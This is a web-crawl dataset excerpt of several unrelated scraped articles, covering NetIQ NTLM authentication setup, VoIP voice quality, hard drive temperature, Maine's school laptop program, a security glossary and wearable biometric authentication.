text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
Many organizations need or desire to do NTLM authentication for their users if system is not part of domain upon Kerberos failure. NT LAN Manager (NTLM) In a Windows network, NT LAN Manager (NTLM) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN), an older Microsoft product, and attempts to provide backwards compatibility with LANMAN. NTLM version 2 (NTLMv2), which was introduced in Windows NT 4.0 SP4 (and natively supported in Windows 2000), enhances NTLM security by hardening the protocol against many spoofing attacks, and adding the ability for a server to authenticate to the client. NTLM is a suite of authentication and session security protocols used in various Microsoft network protocol implementations and supported by the NTLM Security Support Provider (“NTLMSSP”). Originally used for authentication and negotiation of secure DCE/RPC, NTLM is also used throughout Microsoft’s systems as an integrated single sign-on mechanism. It is probably best recognized as part of the “Integrated Windows Authentication” stack for HTTP authentication; however, it is also used in Microsoft implementations of SMTP, POP3, IMAP (all part of Exchange), CIFS/SMB, Telnet, SIP, and possibly others. The NTLM Security Support Provider provides authentication, integrity, and confidentiality services within the Window Security Support Provider Interface (SSPI) framework. SSPI specifies a core set of security functionality that is implemented by supporting providers; the NTLMSSP is such a provider. The SSPI specifies, and the NTLMSSP implements, the following core operations: Authentication — NTLM provides a challenge-response authentication mechanism, in which clients are able to prove their identities without sending a password to the server. Signing — The NTLMSSP provides a means of applying a digital “signature” to a message. This ensures that the signed message has not been modified (either accidentally or intentionally) and that that signing party has knowledge of a shared secret. NTLM implements a symmetric signature scheme (Message Authentication Code, or MAC); that is, a valid signature can only be generated and verified by parties that possess the common shared key. Sealing — The NTLMSSP implements a symmetric-key encryption mechanism, which provides message confidentiality. In the case of NTLM, sealing also implies signing (a signed message is not necessarily sealed, but all sealed messages are signed). NTLM has been largely supplanted by Kerberos as the authentication protocol of choice for domain-based scenarios. However, Kerberos is a trusted-third-party scheme, and cannot be used in situations where no trusted third party exists; for example, member servers (servers that are not part of a domain), local accounts, and authentication to resources in an untrusted domain. In such scenarios, NTLM continues to be the primary authentication mechanism (and likely will be for a long time). Microsoft no longer recommends NTLM in applications: “Implementers should be aware that NTLM does not support any recent cryptographic methods, such as AES or SHA-256. It uses cyclic redundancy check (CRC) or message digest algorithms (RFC1321) for integrity, and it uses RC4 for encryption. Deriving a key from a password is as specified in RFC1320 and FIPS46-2. Therefore, applications are generally advised not to use NTLM.” While Kerberos has replaced NTLM as the default authentication protocol in an Active Directory (AD) based single sign-on scheme, NTLM is still widely used in situations where a domain controller is not available or is unreachable. For example, NTLM would be used if a client is not Kerberos capable, the server is not joined to a domain, or the user is remotely authenticating over the web. New authentication class will extend existing Kerberos class. Adds NTLM support along with Kerberos and fall back mechanism. NAM will send authentication challenge for Kerberos and NTLM. Browser/user-agent will try Kerberos if it fails NTLM will be tried. If user selects not to do NTLM, then fall back method will be executed. Create computer account and note down username and password. To create computer account follow the section Computer Account Information below. Other option is download jespa package http://www.ioplex.com/downloads.php and extract copy SetupWizard.vbs Readme.txt and license to domain controller and execute the SetupWizard.vbs and note down username password. NetIQ Access Manager Identity Server setup details Download and copy the jar files, which has custom authentication class and dependent library jar files to folder to your NAM 3.2.x / 4.0 Identity Server(s) /opt/novell/nam/idp/webapps/nidp/WEB-INF/lib As you would add any new authentication scheme to NAM, use the NAM Admin Console to define a new authentication Class, Method, and Contract on your Identity Server / Cluster. First define the Kerberos-NTLM Authenticator Class under the “Local” tab select Classes and click New to add your Google Authenticator Class. Specify the logical name for your class eg. Kerb-Ntlm below and from the drop-down list select the “java class” parameter as Other and enter the “java class path” as com.netiq.custom.auth.KerbNtlmClass Before hitting Apply or OK, add following properties to the class com.novell.nidp.authentication.local.kerb.svcPrincipal – service principal as created based Kerberos authentication documentation com.novell.nidp.authentication.local.kerb.realm – realm value com.novell.nidp.authentication.local.kerb.jaas.conf – jaas configuration file com.novell.nidp.authentication.local.kerb.kdc – KDC IPAddress com.novell.nidp.authentication.local.kerb.ADUserAttr – userstore search attribute name com.novell.nidp.authentication.local.kerb.upnSuffixes – upn suffixes, domain names Above parameters can be referred to NAM documentation. Map above parameters with Kerberos documentation. Following parameters used by NTLM DOMAIN_CONTROLLER_IP – AD domain controller IPAddress DOMAIN_CONTROLLER_FQDN – AD domain controller FQDN SERVICE_ACCOUNT_NAME – Computer account name SERVICE_ACCOUNT_PWD – Computer account password DOMAIN – windows NT type domain name Your NAM authentication class is now defined. Next, define a NAM Identity Server Method using the custom Kerberos NTLM Authenticator Class just created, click Apply. Your NAM authentication method is now defined. Next, define a Contract, click Apply. Apply changes on IDP and update IDP server Testing the configuration: Access NetIQ Identity Server page http(s)://<<idp server >>:<<port>>/nidp or protected resource Select the newly created contract. If client machine is connected to domain, user will be authenticated with Kerberos. If client machine is not connected to domain, NTLM login prompt shows up. Enter user name as email@example.com and password If user does not want to do the NTLM, user can click cancel, where fall back method will be executed. Computer Account Information If you don’t have Computer Account please follow following steps to create a computer account in AD. Step 1: Create the Service Account for NETLOGON Communication To use the NTLM security provider as an authentication service you will need to create a service account in Active Directory with a specific password. To create the service account, the Active Directory Users and Computers (ADUC) utility may be used. The NETLOGON service requires that this account be a Computer account (a User account will not work). We recommend that you use the same value for both the “Computer name” (cn) and “pre-Windows 2000 name” (sAMAccountName) and use only letters, digits and possibly underscores (do not use spaces). This name will be part of the service.acctname property described in the NtlmSecurityProvider Properties section. Also determine and note the service account “distinguished name” (DN) for setting the password in the next step. The DN can usually be derived from the account name and domain. For example if the service account name CIGNEXCMS1 is in the Active Directory domain cignex.com, the DN might be: CN=CIGNEXCMS1,CN=Computers,DC=CCA,DC=cignex,DC=com. If you are still not sure about what the DN is, the ADSI Edit MMC Snap-In will show you directory entries by DN. Step 2: Set the Service Account Password The service account password must be supplied to authentication class Currently we are unaware of a standard MS utility that can be used to set passwords on Computer accounts. Therefore, the following VBScript is used to set the password on a Computer account. Copy Paste following VB Script code in file called SetComputerPass.vbs , you can find this script as an attachment to this Wiki. Dim strDn, objPassword, strPassword, objComputer If WScript.arguments.count 1 Then WScript.Echo “Usage: SetComputerPass.vbs <ComputerDN>” WScript.Quit End If strDn = WScript.arguments.item(0) Set objPassword = CreateObject(“ScriptPW.Password”) WScript.StdOut.Write “Password:” strPassword = objPassword.GetPassword() Set objComputer = GetObject(“LDAP://” & strDn) objComputer.SetPassword strPassword WScript.Echo WScript.Echo “Password set on ” & strDn Note: This script should also work remotely from another workstation provided it is executed with sufficient credentials. C:\>cscript SetComputerPass.vbs CN=CIGNEXCMS1,CN=Computers,DC=CCA,DC=cignex,DC=com Password: Note: You have to login as an Administrator to run the above command. DO NOT use same password as Computer Account Name and it should match AD Password Policy Use a long and random password and make a note of it. And later it will be configured in portal-ext.properties In this case, open SetComputerPass.vbs with notepad and just temporarily hard-code the password by commenting out the three lines that collect the password (a ‘ is a comment in VBScript) and set it manually like following and try to run the command again ‘Set objPassword = CreateObject(“ScriptPW.Password”) ‘strPassword = objPassword.GetPassword() strPassword = “ALongRandomPassword” Note: Unlike User accounts, Computer account passwords do not expire. Domain security policy is frequently used to instruct Windows installations to periodically reset their own passwords however in practice these accounts are not denied access if they do not (such as because they were turned off for several months). Configuration for authentication class for NTLMv2 Add UPN suffix for NTLMv2 to succeed. This is necessary since NTLM returns/authenticates based on the samAccountName, and does not return the email address of the user, so LDAP lookup can only be via AD username, not email address. If UPN suffix is added, userPrincipalName can be found by building username into email format. Disclaimer: As with everything else at NetIQ Cool Solutions, this content is definitely not supported by NetIQ, so Customer Support will not be able to help you if it has any adverse effect on your environment. It just worked for at least one person, and perhaps it will be useful for you too. Be sure to test in a non-production environment.
<urn:uuid:1b26d5bc-4b18-4e58-88ac-cb78ae329d4c>
CC-MAIN-2017-04
https://www.netiq.com/communities/cool-solutions/how-to-configure-netiq-access-manager-for-ntlm-authentication-by-extending-existing-kerberos-authentication/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00413-ip-10-171-10-70.ec2.internal.warc.gz
en
0.821931
2,680
2.578125
3
The onset of mobile phones has made us tolerant of bad voice quality on our phone conversations. VoIP technology has made voice and video communication accessible and affordable to many people. Service providers and carriers have been striving to provide high quality voice using VoIP technology. So, what is so different in VoIP from the “old” technology? VoIP carries voice signals over an IP network. This is fundamentally different from the “old” circuit switched technology where digital voice signals were carried on dedicated channels. IP was designed to carry data. It meant that the file you wanted to download can take it’s own time to download. You wouldn’t be concerned if it downloaded in 20 seconds or 100 seconds as long as it completes in a reasonable time. However, a telephone conversation should be more “real-time”. You expect to hear a “Hello” from the other end immediately after you’ve said Hello, so that you can have a meaningful conversation. So, what network parameters affect voice quality in VoIP? Think of this as a pipe that can get you data. The bigger the pipe, the more simultaneous conversations you can have. But how big of a pipe do you need to have one conversation? The answer to this question depends on the codec. When analog voice is digitized, it is sampled 8000 times per second. Each sample is encoded in 8-bits. So, we need to have a bandwidth of 64000 bits per second (or 64 kbps) one way. Now-a-days, available bandwidth is not a concern – as long as all of you at home are not watching your own movies streamed over the internet. The IP network is expected to be lossy. Packets can be dropped randomly. However, today’s IP network is fairly reliable and losses are minimal. The core networks advertise maximum loss rate of 0 – 0.5%. This is the main contributor to bad voice quality. The codecs are very sensitive to loss. Ideally, there should be zero packet loss. We saw earlier that there will be 8000 samples of voice taken per second. The Real-time Transport Protocol (RTP) uses 20ms or 30ms packets. So, there is a packet expected every 20ms at the client. Due to the nature of the IP network, the packets may be delayed on the way. This delay varies and is called jitter. A way to tackle this problem is to have jitter buffers. But, this could be a double edged sword – a big buffer will introduce latency and a very small one can be useless. Usually, it is better to have the jitter buffers on the endpoints and not in the network. This will make sure that no additional delays are introduced while still smoothing out the voice signal played. This is the time it takes for the packets to travel from source to destination. Physics tells us that the signals do take some finite time to travel. Added to that are all the routers and switches these packets have to travel through. So, a certain amount of time is spent in the network by these packets. The question is how much latency can be tolerated? The answer is: it depends. Remember that TV correspondent on the field staring into the camera for a seemingly long time of silence before speaking? Assuming there is only latency in the network, the question becomes how long can you wait for a response after you’ve spoken? If the latency is very low, the responses will be immediate. If it is, say 1 second, then you’ll hear a response 2 seconds after you’ve spoken because your voice packet takes 1 second to reach the other side and the response from the other side takes 1 second to reach you. ITU-T recommends a one-way ear-to-mouth delay of about 150 ms or less for excellent quality voice and 400 ms for acceptable quality. So, how can we get a rough measure of end-to-end latency? I learnt a trick here at Bandwidth. Assume you have two mobile phones. The end-to-end delay can be measured like this: - Use a microphone. Connect it to the laptop. - Run Audacity application on the laptop. - Now call Phone B from Phone A - Answer phone B and put it on speakerphone. - Start recording on the Audacity application. - Tap on the table. The sound is captured by the microphone over the air. - After some delay, it is also heard over the microphone. - Stop recording. - Look at the waveform shown on audacity and identify the first tap sound and the second occurrence. - The time difference represents the end-to-end delay. This gives you a fairly accurate measure of the delay. In the figure above, the first noise is the tap on the table caught by the microphone through the air. The second noise is the tap heard from the phone that had the microphone near its’ speaker. As can be seen, the selection started at 10.311s and ended at 10.629s. The difference is the end-to-end delay which is 318ms. So the next time you hear a distorted voice on your phone, you know what could be the possible causes.
<urn:uuid:ebac7ab0-345c-4d7a-b38b-91a082249f2c>
CC-MAIN-2017-04
https://blog.bandwidth.com/hello-can-you-hear-me-now-what-network-parameters-affect-voice-quality-in-voip/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00321-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950767
1,093
3.203125
3
Most of us know that extreme temperatures (whether hot or cold) can kill our electronics. But how much do you actually have to worry about temperature, when it comes to your hard drive--and all the precious data you store on it? The folks at Backblaze offer some insights, based on an analysis of over 34,000 drives. Tl;dr: They find no significant correlation between temperature and failure rate, overall. So if you keep the temperature within the recommended manufacturer range, you don't have to worry about keeping the drive extra cool. This comes with the caveat that their consumer- and enterprise-grade drives are running in pods in a data center, which provide airflow over the drives so they don't get too hot. Still, some drives get hotter than others depending on their locations, and different drive models run at different temperature ranges. Here's a geeky chart: Backblaze says "all of the drives run well within the 0˚C (or 5˚C) to 60˚C that the manufacturers specify for the drives." The drive the Backblaze did find had a significant failure rate correlation with higher temperature is the Seagate Barracuda 1.5TB. Unless your drives are that model, your drives are probably cool enough. (Assuming you're not working in high heat environments and your computer isn't getting too hot, that is.) Read more of Melanie Pinola’s Tech IT Out blog and follow the latest IT news at ITworld. Follow Melanie on Twitter at @melaniepinola. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook.
<urn:uuid:9ad99134-5c42-448f-b573-1c52bcbbadf0>
CC-MAIN-2017-04
http://www.itworld.com/article/2698808/consumerization/why-you-probably-don-t-need-to-keep-your-hard-drive-as-cool-as-possible.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00531-ip-10-171-10-70.ec2.internal.warc.gz
en
0.944923
344
2.5625
3
GORHAM, Maine -- The Maine Learning Technology Initiative appears to be a gamble that's paying off, according to a new report from the Maine Education Policy Research Institute. The MLTI, a statewide program to provide every seventh- and eighth-grade students and their teachers with laptop computers and to provide teachers with professional development and training to help them integrate the new laptops into their classroom instruction, is in its first year. The Maine Education Policy Research Institute (MEPRI) conducted the MLTI's first year evaluation. The goal of the research was to provide policymakers and practitioners with information to help them gauge whether the MLTI is doing what it was mean to do. The was performed using surveys and case studies, the MEPRI said in its executive summary of its report. The surveys -- some of which were Web based -- were used a primary means of gathering data from large samples of students, educators and parents. Case studies of representative schools and student groups were conducted, using interviews, focus groups, classroom observations and analysis of school level documents -- such as memos to parents and school policies, including analysis of student work -- to collect other data. The MEPRI evaluation team said it focused its evaluation on getting answers to three key questions in the three core areas of teachers and teaching; students and learning; and schools and community. The three questions that guided the evaluation team were: How are the laptops being used?; What are the impacts of the laptops on teachers, students, and schools?; and are there obstacles to full implementation of the MLTI? A majority of teachers reported using the laptop in lesson development and classroom instruction, according to the MEPRI evaluation, and teachers said they were better able to locate more up-to-date information, access information more easily and quickly, present lessons and create student assignments. Teachers also said the changes were having positive impacts on their teaching, the evaluation found, because their lessons are more extensive, use more up-to-date resources and provide more opportunities to explore knowledge and information in more depth. But teachers also reported that some technical problems and the lack of technical support sometimes limit their use of the laptops, the evaluation said. In addition, teachers said they need more time and professional development for this to occur, including time to explore and learn how to use the technology and professional development activities designed to help them integrate the technology more extensively in their curriculum development and instruction. Overall, the evaluation said, many teachers remain enthusiastic about the MLTI and look forward to learning more through sustained training efforts. In the second core area, students and learning, the early evidence indicates that the MLTI has dramatically increased the use of technology within classrooms, the evaluation said. Students have reported using their laptops to research information, complete assignments, create projects, and communicate with teachers and other students. As the students begin to use the laptops more within their classes, they report an increase in interest in their schoolwork and an increase in the amount of work they are doing both in and out of school, the research found. The nature of student learning in classrooms may be changing because students have the tools to pursue, organize, analyze and present information more readily at hand, the report round, and although some students continue to experience technical problems, most are excited about using the laptops in their classes. Although it is too soon to fully assess the impact of MLTI on the third core area -- school and community -- early evidence indicates positive changes. Parents report that their children are more focused and more interested in school. Schools have faced some added expenses in the implementation of the program but through creative solutions, many schools are finding ways to minimize these costs, and possibly even save money as the laptops replace materials such as reference books and calculators. Finally, even more positive changes resulting from MLTI are anticipated by school principals and superintendents, although these impacts cannot yet be measured, the evaluation said. The evaluation said the evidence indicates that significant progress has been made in implementing the MLTI, and though it is early in the implementation, the laptop program is having many positive impacts on teachers and their instruction, and on students' engagement and learning. Some obstacles still exist in fully implementing the program, the evaluation said, but significant strides have been made in a very short time period toward achieving the MLTI's goals.
<urn:uuid:df09a9f0-5464-436a-b449-de968cd3b537>
CC-MAIN-2017-04
http://www.govtech.com/e-government/Maine-Laptop-Program-Gets-High-Marks.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00165-ip-10-171-10-70.ec2.internal.warc.gz
en
0.972078
888
2.5625
3
2FA (Two-Factor Authentication) All techniques used to strengthen typical Username/password login session (e.g. single factor authentication) by adding a second security challenge. 3FF (3rd Form Factor) A very small SIM card, also known as micro-SIM, for use in small mobile device. 3G (Third Generation) The broadband telecommunications systems that combine high speed voice, data and multimedia. 3GPP (3G Partnership Project) A industry group that aims to produce specifications for a 3G system based on GSM Networks. A Comprehensive, secure all-IP based mobile broadband solution to smartphones, tablets, laptop computers, wireless modems and other mobile devices. Automatic Border Control The use of an Automated gate in lieu of a one-to-one meeting between the Traveller and an Immigration Officer. The objective of deploying Automatic Border Control is to automate the process for a large percentage of the Travellers' flow and to allow the Immigration Officers personnel to perform face-to-face control on identified targets. Techniques and solutions to grant or deny access to a given user for a given digital service. Consumers are very familiar with Username/Password as a basic access control technique for popular web services such as web mails or eMerchants web sites. Security sensitive services such as Payment or eGov are often deploying more robust access control techniques, usually relying on Secure Elements, Smart Cards being one example. A collection of data set so large and complex that they are difficult to process with traditional applications. The term "big data" is commonly used to present new analytical applications leveraging on the power of very large amounts of data sets. A typical example is CRM (Customer Relationship Management) whereby the analysis of large amounts of past data can provide tools to improve sales forecasts, stocks management, marketing trends and customer behaviors. Data Analysis is foreseen as an opportunity to monetize such "big data" by improving business intelligence. Human attributes that are unique to one given individual and can be digitalize to then be compared with a stored reference. The use of biometrics data such as finger prints can be used for security services such as access control, data encryption or digital signature The challenge of Biometry is to enroll then securely store the reference data for each individual. Smart Card solutions offer match-on-card applications, removing the need for an online verification via a central database. A short range wireless technology that simplifies communication and synchronization between the internet, devices and other computers. Bluetooth is commonly used for consumers electronics devices such as, for example, headsets for cell phones or MP3 players. Bluetooth requires first the user to establish a pairing between two devices. Once this pairing is establish, a fast wireless data exchange between the two devices can happen. Everything about the standard at: Bot (Internet bot) A type of computer program designed to do automated tasks. The act of controlling Travellers identities and visas when entering a given country (Airports, Sea-ports or roads) Common Access Card: a US Department of Defense smart card issued as standard physical and network identification for military and other personnel. Learn more about the DoD Common Acces Card CDMA (code Division Multiple Access) A wireless communications technology that uses the spread spectrum communication to provide increased bandwidth. Computing by using servers, storage and applications that are accessed via the internet. Cloud Computing is the architecture of choice for popular applications such as Web Mail, Social Networks, collaborative applications such as Microsoft office 365 or Google Docs. The promesses of Cloud Computing are no data losses, no backup needed, no software license updates needed. Applications are executed from a web browser or an apps. The application itself and the user data are hosted in a Data Center. Cloud Computing is often seen as the alternative to client software where a license of a given software is installed and executed on the user's device. A card that communicates by means of a radio frequency signal, eliminating the need for physical contact with a reader. Contactless communications includes several technologies aiming at performing short range data transfer betwenn two communicating devices. Operational ranges can vary from 2cm to 10 to 15 meters. Contactless Cards used for Payment or Transport use very short range technolgy. Such card's silicon chip are powered by the proximity of the reader to establish the contactless communication in a secure manner. Customer Relationship Management A set of tools and techniques using data to enhance sales forecast, supply strategy, pricing strategy and all aspects of products&services strategy. CRM is foreseen has a key application of Big Data, where large amounts of past data can really enhance current and future business steering and decision making. DDA (Dynamic Data Authentication) Authentication technology that allows banks to approce transactions at the terminal in a highly secure way. DI (Dual Interface) A device that is both contact and contactless. Dual-Interface cards, combining contact and contactless transactions are often used for EMV payment. There are also more an more payment + transport cards where a payment card is also used to access to a mass transit network. Diagnostic and Monitoring Management objects. The Diagnostics and Monitoring (DiagMon) functions perform various Diagnostics and Monitoring activities on mobile phones. DIAGMONMO defines as well a way to perform network monitoring (GSM, UMTS or LTE) byautomatically getting network status from the handset. Humans can own one or several Digital Identiti(es) - also called avatars - to be used to access various deigital services For secure services, Digital Identities must be issued by a Certificate Authority (CA) capable to establish a link between the actual user and his/her digital Identities. There is no limit to how many Digital Identities any given user may have. An electronic signature created using a public-key algorithm that can be used by the recipient to authenticate the identity of the sender. Device Management: Management of mobile phone configuration, updates and other managed objects of mobile devices over the entire life-cycle as defined by OMA DM. DM is also used generically to describe all methods and activities associated with mobile device management. Device Management Solutions DNS Cache poisoning A technique that tricks a Domain Name Server (DNS server) into believing it has received authentic information when in reality it has not. Any small piece of hardware that plugs into a computer. Most popular form-factor are USB keys or Smart Cards that can get inserted into card readers Innovative device using optical reader have also been launched onto the market. Diffractive Optical Variable Image Device: a hologram, kinegram or other image used in secure printing of cards, documents etc. Digital Video Broadcasting-Handheld: a technical specification for bringing broadcast services to handheld receivers. EAC (Extended Access Control) A mechanism enhancing the security of ePassports whereby only authorized inspection systems can read biometric data. Accessing banking services via the internet Buying and selling goods via the internet. a pre-3G digital mobile phone technology allowing improved data transmission rates. The use of digital technologies (often via the internet) to provide Government services. Second generation eGov 2.0 programs aim to increase efficiency, lower costs and reduce. Personal identification using a variety of devices secured by microprocessors, biometrics and other means. The industry standard for international debit/credit cards established by Europay, MasterCard and Visa. Find out more about EMV An "electronic" passport with high security printing, an inlay including an antenna and a microprocessor, and other security features. More info on ePassport A small portable device that contains "electronic money" and is generally used for low-value transactions. A diverse family of computer networking technologies for local area networks (LANs). Electronic systems for issuing, checking and paying for tickets predominantly for public transport. More info on Transport European Telecommunications Standards Institute: the EU organization in charge of defining European telecommunications standards. FIPS 201 (Federal Information Processing Standard) A US federal government standard that specifies Personal Identity Verification requirements for employees and contractors. FOMA (Freedom of Mobile Multimedia Access) The brand name for world's first W-CDMA 3G services offered by NTT DoCoMo, the Japanese operator. Please refer to FUMO Device Management Solutions Firmware Update Management Object, is an Open Mobile Alliance specification for updating the firmware of mobile devices over the air. FUMO allows mobile operators to update mobile devices across network infrastructure without requiring consumers or network engineers to initiate upgrades through direct contact. It enables operators and device manufacturers to perform updates over-the-air ranging from the simple ones (e.g.:security patch) to the most complex (e.g.: important parts of the operating system). Device Management Solutions GSM (Global System for Mobile Communications) A European standard for digital cellular phones that has now been widely adopted throughout the world. GSMA (GSM Association) The global association for Mobile phone operatorsFind out more about GSMA Health Insurance Portability and Accountability Act: the US act that protects health insurance coverage for workers and their families when they change or lose their jobs HSPD-12 (Homeland Security Presidential Directive 12) Orders all US Federal Agencies to issue secure and reliable forms of identification to employees and contractors , with a recommendation in favor of smart card technology. Identity and Access Management ICAO (International Civil Aviation Organization) The United Nations agency which standardizes machine-readable and biometric passports worldwide. Using text on a mobile handset to communicate in real time IP (Internet Protocol) A protocol for communicating data accross a network; hence an IP address is a unique computer address using the IP standard. International Organization for Standardization: an international body that produces the worldwide industrial and commercial "ISO" standards. A network oriented programming language invented by Sun Microsystems and specificallt designed so that programs can be safely downloaded to remote devices. Key (keystroke )logging A means of capturing a user’s keystrokes on a computer keyboard, sometimes for malicious purposes. L6S (Lean Six Sigma) A methodology for eliminating defects and improving processes. Lock And Wipe Management Object. It is an Open Mobile Alliance specification for locking handsets in case they are lost or stolen or for wiping the handsets’ memory. The handset wipe removes all personal data stored either on the handset memory or on the inserted memory card. As a result, the handset is then totally blank, without any chance to retrieve the data. Device Management Solutions LTE (Long Term Evolution) The standard in advanced mobile network technology, often referred to as 4G. Technology enabling communication between machinesfor applications such as smart meters, mobile health solutions, etc… Malicious software designed to infiltrate or damage a computer system without the owner's consent. An attack in which an outsider is able to read, insert and modify messages between two parties without either of them knowing. Buying and selling goods and services using a mobile device connected to the internet. MFS (Mobile Financial Services) Banking services such as money transfer and payment, available via a mobile device. Microprocessor (smart) card A 'smart" card comprising a module embedded with a chip, a computer with its own processor, memory, operating system and application software. A removable memory card that can also be modified by adding a microprocessor to become a Secure Element, using the SDIO protocol to communicate with the device. Complementary information about MicroSD Card MIM (Machine Identification Module) The equivalent of a SIM with specific features such that it can be used in machines to enable authentificationMMS (Multimedia Messaging Service) a standard way of sending messages that include multimedia content (e.g. photographs) to and from mobile phones. A standard way of sending messages that include multimedia content (e.g. photographs) to and from mobile phones. MNO (Mobile Network Operator) A company that provides services for Mobile devices subscribers. Banking and payment services for unbanked users. The unit formed of a chip and a contact plate. Using a mobile handset to pay for goods and services. NFC (Near-Field Communication): A wireless technology that enables communication over short distances (e.g. 4cm), typically between a mobile device and a reader. OATH (The Initiative for Open Authentication) An industry coalition comprising Gemalto, Citrix, IBM, Verisign and others, that is creating open standards for strong authentication. OMA (Open Mobile Alliance) A body that develops open standards for the mobile phone industry. Find out more about Open Mobile Alliance Open Mobile Alliance – Client Provisioning. Standardized protocol to configure basic settings on a mobile phone, using SMS bearer. Device Management Solutions Open Mobile Alliance – Device Management. Standardized protocol to configure advanced services on mobile phones, using IP bearer. Device Management Solutions OS (Operating System) Software that runs on computers and other smart devices and that manages the way they function. OTA (Over The Air) A method of distributing applications and new software updates which are already in use. OTP (One Time Password) A password that is valid for only one login session or transaction. The process of recovering secret passwords from data in a computer system. PDA (Personal Digital Assistant) A mobile device that functions as a personal information manager, often with the ability to connect to the internet. PDC Personal Digital Cellular A2G mobile phone standard used in Japan and South Korea. Sending fraudulent emails requesting someone’s personal and financial details. PIN (A Personal Identification Number) A secret code required to confirm a user's identity. PKI (Public Key Infrastructure) The software and/or hardware components necessary to enable the effective use of public key encryption technology. Public Key is a systel that uses two different keys (public and private) for encrypting and signing data. Short to mid-range wireless communication technology typically used for low end services with no security needs (Tags). RUIM (Public Key Infrastructure) Xan identity module for standards other than GSM. Software Component Management Object. It is an Open Mobile Alliance specification that allows a management authority to perform software management on a remote device, including installation, uninstallation, activation and deactivation of software components. Device Management Solutions SE (Secure Element) A secure and personalised physical component added to a system to manage users rights and to host secure apps. SE typically consist of a Silicon Chip, a secure Operating System, application software and a secure protocol to communicate to the device. SE can be a removable device (such as UICC or µSD for mobile devices or MIM for M2M connected machines). SE can also be components inside the system. SIM (Subscriber Identity Module) A smart card for GSM systems. SMS (Short Message Service) A GSM service that sends and receives text messages to and from a mobile phone. It refers to any authentication protocol that requires multiple factors to establish identity and privileges. This contrasts with traditional password authentication which requires only one authentication factor such as knowledge of a password. Common implementations of strong authentication use 'something you know' (a password) as one of the factors, and ‘something you have' (a physical device) and/or 'something you are' (a biometric such as a fingerprint) as the other factors. TEE (Trusted Execution Environment) A software and hardware dedicated environment embedded within the core device microprocessor to host and execute secure applications. TEE consists of dedicated logic (hardware) within the device microprocessor with its own secure Operating System (software) and secure API to communicate with the Device rich-Operating system. TEE acts like a vault within the microprocessor to ensure a secure provisioning and execution of security sensitive appliactions such as payment. A TSM service is used to install software applications within the TEE environment, as well as performin activation:de-activation of services. A computer (client) that depends primarily on a central server for processing activities. By contrast, a fat client does as much local processing as possible. A program that contains or installs a malicious program. TSM (Trusted Services Manager) A third party enabling Mobile Operators, Mass Transit Operators, Banks and businesses to offer combined services seamlessly and securely. UICC (Universal Integrated Circuit Card) A high capacity smart card used in mobile terminals for GSM, UMTS/3G and now 4G/LTE networks. UMTS (Universal Mobile Telecommunications System): One of the 3G mobile telecommunications technologies which is also being developed into a 4G technology. USB (Universal Serial Bus) A standard input/output bus that supports very high transmission rates. USIM (Universal Subscriber Identity Module) A SIM with adbanced software that ensures continuity when migrating to 3G services. VPN (Virtual Private Network) A private network often used within a company or group of companies to communicate confidentially over a public network. W-CDMA (Wideband Code Division Multiple Access) A 3G technology for wireless systems based on CDMA technology.
<urn:uuid:eb5da8f5-20fd-4479-9229-30b3c71ed305>
CC-MAIN-2017-04
http://www.gemalto.com/techno/glossary
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280266.9/warc/CC-MAIN-20170116095120-00009-ip-10-171-10-70.ec2.internal.warc.gz
en
0.877083
3,662
2.546875
3
Definition: A group of analytical approaches having mathematically precise foundation which can serve as a framework or adjunct for human engineering and design skills and experience. See also formal verification, model checking. If you have suggestions, corrections, or comments, please get in touch with Paul Black. Entry modified 17 December 2004. HTML page formatted Mon Feb 2 13:10:39 2015. Cite this as: Paul E. Black, "formal methods", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 17 December 2004. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/formalmethod.html
<urn:uuid:32569516-588b-4196-99ca-0baa842b3565>
CC-MAIN-2017-04
http://www.darkridge.com/~jpr5/mirror/dads/HTML/formalmethod.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00339-ip-10-171-10-70.ec2.internal.warc.gz
en
0.872345
154
2.546875
3
A group of researchers is proposing a sensor that would authenticate mobile and wearable computer systems by using their unique electrical properties of a person's body to recognize their identity. In a paper being presented today at the USENIX Workshop on Health Security and Privacy, researchers from Dartmouth University Institute for Security, Technology, and Society defined this security sensor device, known as Amulet, as a "piece of jewelry, not unlike a watch, that would contain small electrodes to measure bioimpedance -- a measure of how the body's tissues oppose a tiny applied alternating current- and learns how a person's body uniquely responds to alternating current of different frequencies." The device uses a recognition algorithm to determine whether the person matches the measured bioimpedance. Once identity has been established a person would be able to simply attach other devices to their body - whether clipped on, strapped on, stuck on, slipped into a pocket, or even implanted or ingested - and have the devices just work. That is, without any other action on the part of the user, the devices discover each other's presence, recognize that they are on the same body, develop shared secrets from which to derive encryption keys, and establish reliable and secure communications, the researchers stated. "We have proposed the concept of a wearable device, in a wristwatch form factor, that would coordinate a person's body-area network of sensors, providing a root of trust. Such a device also provides a perfect platform for implementing a biometric recognition mechanism. We expect that the necessary electronics and skin-contact sensors for bioimpedance could easily be integrated into an Amulet-like device." The idea is to ensure the security of the increasing amounts of mobile and wearable systems used for monitoring health conditions and lifestyle-related conditions at what the researchers called an unprecedented level of detail, researchers stated. "Wireless connectivity allows interaction with other devices nearby (like entertainment systems, climate control systems, or medical devices). Sensor data may be automatically shared with a social-networking service, or uploaded to an Electronic Medical Record system for review by a healthcare provider, the researchers stated. "However, in spite of recent advances, significant challenges remain. Reliably interpreting data from a body-worn sensor often requires information about who is wearing the sensor as well as the current person's environment, location, current activity, and social 